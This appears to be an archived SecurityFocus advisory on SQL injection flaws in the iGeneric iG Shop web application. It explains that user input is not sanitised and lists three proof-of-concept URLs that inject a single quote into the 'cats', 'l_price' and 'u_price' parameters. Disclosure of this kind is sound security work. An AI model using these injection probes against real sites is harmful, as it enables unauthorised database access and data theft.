14 lines
No EOL
1.1 KiB
Text
14 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/12627/info
|
|
|
|
iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries.
|
|
|
|
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
|
|
|
|
It is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed.
|
|
|
|
The following proof of concepts are available:
|
|
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
|
|
|
|
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
|
|
|
|
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search |